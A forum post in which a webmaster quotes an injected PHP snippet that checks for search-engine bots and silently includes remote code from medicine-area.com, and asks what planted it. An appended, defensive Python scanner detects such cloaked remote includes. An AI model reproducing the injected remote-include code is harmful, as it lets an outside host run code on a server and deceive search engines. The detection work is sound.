What causes web attack to promote medicine-area.com?


I found the following code snippet added to a page on a webserver:
<?  if ((eregi("bot", $_SERVER['HTTP_USER_AGENT']) or eregi("urp",
{@include("http://medicine-area.com/html.php ");} ?>

It looks as if the purpose of this attack is to promote the website mentioned by
creating a link to it that is only visible to search engine bots and crawlers.
I am very thankful for any help about what is causing this code to land on the
webserver. Both the web hoster and I checked the server's log files and checked
for rootkits, but could not find anything.

thanks, Mark
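
An added example, not part of the original post: a Python scan for the pattern described above, a PHP block that reads the visitor's User-Agent and pulls in a remote URL through include/require. The function names, the file-suffix list and the sample strings (with the placeholder domain example.invalid) are assumptions made for this example.

```python
import re
from pathlib import Path

# PHP blocks, including the short "<?" open tag used in the injected snippet.
PHP_BLOCK = re.compile(r"<\?(?:php|=)?(.*?)(?:\?>|\Z)", re.S | re.I)
# include/require (optionally @-silenced) whose argument is a remote URL.
REMOTE_INCLUDE = re.compile(
    r"@?\b(?:include|require)(?:_once)?\s*\(?\s*[\"']\s*((?:https?|ftp)://[^\"'\s]+)",
    re.I)
# Any read of the visitor's User-Agent header.
UA_READ = re.compile(r"\$_SERVER\s*\[\s*[\"']HTTP_USER_AGENT[\"']\s*\]", re.I)


def scan_source(text):
    """Return (severity, url) for every remote include found in PHP code."""
    findings = []
    for block in PHP_BLOCK.finditer(text):
        code = block.group(1)
        # A User-Agent check in the same block suggests crawler-only cloaking.
        cloaked = bool(UA_READ.search(code))
        for inc in REMOTE_INCLUDE.finditer(code):
            severity = "cloaked-remote-include" if cloaked else "remote-include"
            findings.append((severity, inc.group(1)))
    return findings


def scan_tree(root, suffixes=(".php", ".phtml", ".inc", ".html", ".htm")):
    """Scan every matching file under root; returns {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in suffixes:
            hits = scan_source(path.read_text(errors="replace"))
            if hits:
                report[str(path)] = hits
    return report


# Constructed samples (not the code from the post; the domain is a placeholder).
INFECTED = """<html><body>Hello</body></html>
<? if (eregi("bot", $_SERVER['HTTP_USER_AGENT']))
{@include("http://example.invalid/html.php ");} ?>"""
CLEAN = """<?php include("header.php"); echo $_SERVER['HTTP_USER_AGENT']; ?>"""

if __name__ == "__main__":
    print(scan_source(INFECTED))
    print(scan_source(CLEAN))
```

Remote includes only work when `allow_url_include` is enabled in php.ini, so that setting is worth checking alongside the scan.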
